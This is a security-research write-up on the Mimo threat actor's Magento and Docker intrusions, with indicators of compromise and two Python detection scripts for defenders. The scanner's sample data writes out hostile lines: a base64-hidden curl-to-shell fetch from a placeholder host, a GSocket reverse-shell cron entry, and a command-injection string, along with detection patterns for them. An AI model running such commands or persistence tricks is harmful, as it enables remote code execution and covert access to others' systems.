Mimo Targets Magento CMS to Steal Card Details and Monetize Bandwidth

The Datadog Security Research team has uncovered the Mimo threat actor, also known as Mimo’lette or Hezb, expanding its operations from Craft CMS to Magento CMS.

Previously documented for deploying cryptominers via public-facing vulnerabilities, Mimo now exploits as-yet-undetermined PHP-FPM flaws in Magento installations to gain initial access, marking a tactical shift toward broader platform targeting.

This evolution includes sophisticated persistence and evasion mechanisms, suggesting preparation for more advanced financial crimes beyond mere resource exploitation.

Evolution of Tactics

Investigations reveal multi-day intrusions where attackers employ command injection through Magento plugins, enabling unauthorized remote access and monetization of compromised systems.

Mimo’s updated toolkit leverages the legitimate GSocket penetration-testing tool to bypass firewalls and NAT, establishing encrypted connections through the Global Socket Relay Network (GSRN) with end-to-end AES-256-CBC encryption and Tor support.

(Figure: Mimo attack flow diagram)

Persistence is achieved through systemd service units, rc.local modifications, and crontab entries that execute GSocket-based reverse shells hourly, masquerading as kernel threads like [kstrp], [watchdogd], or [kswapd0] to evade detection.

A notable evasion technique uses the memfd_create() syscall to create anonymous in-memory files named after legitimate kernel processes (e.g., memfd:[rcu_sched]), allowing payloads to run without leaving a footprint on disk.
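One way to hunt for the two tricks just described (payloads executing from an anonymous memfd, and user-space processes wearing kernel-thread names such as [kswapd0]) on a Linux host, as an added example that is not part of the Datadog report: the script below reads /proc, flags any process whose exe link points into a memfd, and flags any process that presents a kernel-thread name without the properties a genuine kernel thread has (no exe link, empty cmdline, parent kthreadd). The sample process list is constructed for the demo; the kernel names it checks are the ones the report mentions plus a few common real ones. Because the LD_PRELOAD rootkit the report describes conceals processes from tools that rely on libc, run a check like this from a clean boot, as the mitigation section advises.

```python
import os
from dataclasses import dataclass
from typing import Dict, List, Optional

# Kernel-thread names the report says Mimo imitates, plus a few genuine ones
# so the sample data below has honest entries to compare against.
KERNEL_NAMES = {"kthreadd", "kstrp", "watchdogd", "kswapd0", "rcu_sched",
                "ksoftirqd", "migration"}


@dataclass
class ProcessInfo:
    pid: int
    ppid: int
    comm: str              # /proc/PID/comm
    exe: Optional[str]     # readlink(/proc/PID/exe); None when it cannot be resolved
    cmdline: str           # /proc/PID/cmdline with NULs replaced by spaces


def claimed_name(p: ProcessInfo) -> str:
    """Name the process shows in 'ps': cmdline if set, else comm, without brackets or CPU suffix."""
    name = (p.cmdline or p.comm).strip().strip("[]")
    return name.split("/")[0]          # ksoftirqd/3 -> ksoftirqd


def is_genuine_kernel_thread(p: ProcessInfo) -> bool:
    """Real kernel threads have no exe link, an empty cmdline, and descend from kthreadd (pid 2)."""
    return p.exe is None and p.cmdline == "" and (p.pid == 2 or p.ppid == 2)


def suspicious_reasons(p: ProcessInfo) -> List[str]:
    """Return the reasons (possibly none) a process deserves analyst attention."""
    reasons = []
    if p.exe and p.exe.startswith("/memfd:"):
        reasons.append("executable lives in an anonymous memfd, not on disk")
    if claimed_name(p) in KERNEL_NAMES and not is_genuine_kernel_thread(p):
        reasons.append("kernel-thread name on a user-space process")
    return reasons


def find_suspicious(procs: List[ProcessInfo]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every process with at least one reason."""
    result = {}
    for p in procs:
        reasons = suspicious_reasons(p)
        if reasons:
            result[p.pid] = reasons
    return result


def collect_processes() -> List[ProcessInfo]:
    """Read live process data from /proc (Linux; run as root to resolve every exe link)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/stat") as f:
                stat = f.read()
            # stat looks like: "1234 (comm) S 1 ..." ; comm may contain spaces
            comm = stat[stat.index("(") + 1:stat.rindex(")")]
            ppid = int(stat[stat.rindex(")") + 1:].split()[1])
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
        except OSError:
            continue                     # process exited or is unreadable
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = None
        procs.append(ProcessInfo(pid, ppid, comm, exe, cmdline))
    return procs


# Constructed sample (not real host data): two genuine kernel threads, a normal
# php-fpm master, a memfd-backed payload posing as kswapd0, and its child shell.
SAMPLE_PROCS = [
    ProcessInfo(2, 0, "kthreadd", None, ""),
    ProcessInfo(45, 2, "kswapd0", None, ""),
    ProcessInfo(812, 1, "php-fpm8.2", "/usr/sbin/php-fpm8.2", "php-fpm: master process"),
    ProcessInfo(1234, 1, "kswapd0", "/memfd:[rcu_sched] (deleted)", "[kswapd0]"),
    ProcessInfo(1300, 1234, "sh", "/memfd:x (deleted)", "sh"),
]

if __name__ == "__main__":
    procs = collect_processes() if os.path.isdir("/proc") else SAMPLE_PROCS
    for pid, reasons in sorted(find_suspicious(procs).items()):
        print(pid, "; ".join(reasons))
```

On the constructed sample, pids 1234 and 1300 are reported and the real kernel threads are not; on a live host the same function runs over collect_processes(), which silently skips processes that disappear mid-scan.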

Prior to deployment, attackers clear artifacts from .bashrc, .bash_profile, and /etc/ld.so.preload, then inject the alamdar.so rootkit to hook system calls, concealing processes such as XMRig miners and IPRoyal proxy clients.

Infrastructure Insights

Financially motivated, Mimo combines cryptojacking with proxyjacking for “profit stacking.” UPX-packed XMRig variants mine Monero on C3Pool, consuming CPU resources, while the hezb.x86_64 IPRoyal Pawns client monetizes bandwidth as residential proxies, generating passive income with minimal overhead.

This dual approach ensures resilience: even if mining is disrupted, proxy operations persist undetected.

Reverse engineering of Docker-targeted variants reveals modular Go-based malware under the alamdar/313 package, featuring file I/O, command execution, and SSH brute-forcing modules that propagate by extracting known_hosts entries and scanning subnets with usernames such as “ec2-user,” indicating an AWS focus.

Multi-tier command-and-control rotates servers (e.g., from 109.205.213.203:21 to 193.32.162.10:21), enhancing operational security.

Additional targeting of misconfigured Docker APIs spawns malicious containers that fetch payloads such as cron.jpg via base64-decoded curl commands, parameterized for service-specific tracking.

This diversification, absent from prior reports, highlights Mimo’s adaptability, potentially enabling card detail theft in ecommerce environments by persisting in memory and evading forensics.

Mitigation involves auditing /etc/ld.so.preload for unauthorized entries, updating CMS platforms, blocking the ports used by Monero mining pools (3333, 5555), and scrutinizing cron jobs for obfuscated commands.

Reviewing process inodes and killing hidden executables from a clean boot is essential to eradicate the rootkit; credentials on the affected host should also be rotated.

Category | IoC | Details
Network | 109.205.213.203:21 | Initial C2 (May 26, 2025)
Network | 193.32.162.10:21 | Secondary C2 (May 28–30, 2025)
Network | 15.188.246.198:80 | Payload hosting server (June 3, 2025)
Network | g.gsocket.ninja | GSocket C2
Network | d.gsocket.ninja | Additional GSocket infrastructure
File | gs-netcat_mini-linux-x86_64 | Covert C2 channel; SHA256: d94f75a70b5cabaf786ac57177ed841732e62bdcc9a29e06e5b41d9be567bcfa
File | alamdar.so | LD_PRELOAD rootkit; SHA256: 7868cb82440632cc4fd7a451a351c137a39e1495c84172a17894daf1d108ee9a
File | hezb.x86_64 | IPRoyal Pawns proxyware; SHA256: 1aa4d88a38f5a27a60cfc6d6995f065da074ee340789ed00ddc29abc29ea671e
Process | Commands containing "sleep 1; kill -9 $PPID" | Initial command injection pattern
Process | Python import "import urllib2 as fbi" | Unique Mimo signature
Process | Cron entries containing "GS_HOST=" or "defunct" | GSocket persistence indicators
Process | Base64 strings starting with "L3Vzci9iaW4v…" | Encodes "/usr/bin/" in obfuscated commands
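The process and cron indicators from the table, together with the /etc/ld.so.preload audit from the mitigation section, turned into a small triage script; this is an added Python example, not code from the Datadog report. It scans crontab lines and process command lines for the listed patterns, decodes any base64 token that begins with the L3Vzci9iaW4v ("/usr/bin/") prefix so the obfuscated command can be read in clear, and lists every active entry in ld.so.preload. The sample cron lines, command lines and preload file contents are constructed for the demo; the hostnames and paths inside them are placeholders.

```python
import base64
import binascii
import re

# Indicator patterns taken from the report's process and cron IoCs.
INDICATORS = [
    ("gsocket_env",        re.compile(r"\bGS_HOST=")),
    ("gsocket_defunct",    re.compile(r"\bdefunct\b")),
    ("kill_parent_shell",  re.compile(r"sleep 1;\s*kill -9 \$PPID")),
    ("mimo_python_import", re.compile(r"import urllib2 as fbi")),
    ("b64_usr_bin",        re.compile(r"\bL3Vzci9iaW4v[A-Za-z0-9+/=]*")),
]

# Constructed sample data (not from the report). The base64 blob is built here
# so it starts with the "/usr/bin/" prefix the table describes.
SAMPLE_B64 = base64.b64encode(b"/usr/bin/curl -s http://payload.invalid/x | sh").decode()
SAMPLE_CRON = [
    "*/5 * * * * /usr/bin/php /var/www/html/bin/magento cron:run",
    "0 * * * * GS_HOST=relay.invalid /tmp/.x/gs-netcat -s SECRET -l -i 2>/dev/null",
    "30 2 * * * /usr/bin/certbot renew --quiet",
    "@reboot echo " + SAMPLE_B64 + " | base64 -d | sh",
]
SAMPLE_CMDLINES = [
    "php-fpm: pool www",
    'sh -c "sleep 1; kill -9 $PPID; id"',
    'python2 -c "import urllib2 as fbi"',
]
SAMPLE_LD_PRELOAD = "# expected to be empty on this host\n/usr/lib/x86_64-linux-gnu/alamdar.so\n"


def scan_line(line):
    """Return the names of every indicator that matches one line of text."""
    return [name for name, rx in INDICATORS if rx.search(line)]


def decode_usr_bin_b64(line):
    """Decode each base64 token starting with L3Vzci9iaW4v ("/usr/bin/") so the
    hidden command can be read; tokens that fail to decode are skipped."""
    decoded = []
    for m in re.finditer(r"L3Vzci9iaW4v[A-Za-z0-9+/=]*", line):
        tok = m.group(0)
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4))   # re-pad if truncated
            decoded.append(raw.decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return decoded


def scan_lines(lines):
    """Return (line_number, line, hits, decoded_payloads) for each flagged line."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            findings.append((n, line, hits, decode_usr_bin_b64(line)))
    return findings


def audit_ld_preload(content):
    """Return every active entry of /etc/ld.so.preload. The file is normally absent
    or empty, so any entry should be verified against the owning package."""
    return [l.strip() for l in content.splitlines()
            if l.strip() and not l.strip().startswith("#")]


if __name__ == "__main__":
    # On a real host, feed `crontab -l` output for every user, /etc/cron* files,
    # and `ps -eo args` instead of the constructed samples.
    for n, line, hits, payloads in scan_lines(SAMPLE_CRON + SAMPLE_CMDLINES):
        print(f"line {n}: {hits} {payloads or ''}\n    {line}")
    for entry in audit_ld_preload(SAMPLE_LD_PRELOAD):
        print("ld.so.preload entry needs review:", entry)
```

The pattern list is deliberately literal so an analyst can map each hit back to the table row it came from; the decoded payload is reported alongside the hit rather than executed or fetched.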
